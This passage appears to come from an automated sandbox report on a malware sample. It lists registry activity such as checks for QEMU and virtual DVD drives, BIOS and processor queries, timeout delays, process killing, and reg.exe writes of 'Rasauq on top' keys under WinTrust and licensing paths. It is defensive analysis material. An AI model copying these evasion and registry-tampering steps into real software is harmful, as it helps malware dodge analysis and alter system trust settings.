| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\system32\powercfg.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
Kills process with taskkill
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software | C:\Windows\system32\reg.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\MuiCache | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\MuiCache | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-994669834-3080981395-1291080877-1000\{7D3EAAF0-B03A-496A-B111-C6B2461A6BAA} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\MuiCache | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 140000000700000001000100050000001400000050003a005c00480066007200650066005c004e0071007a00760061005c004e006300630051006e0067006e005c005900620070006e0079005c005a00760070006500620066006200730067005c00420061007200510065007600690072005c00420061007200510065007600690072002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f50100000000000000000000e9070300420061007200510065007600690072000a0041006200670020006600760074006100720071002000760061000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000006e7590a74094db0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e9070300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e9070300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e9070300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff82ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000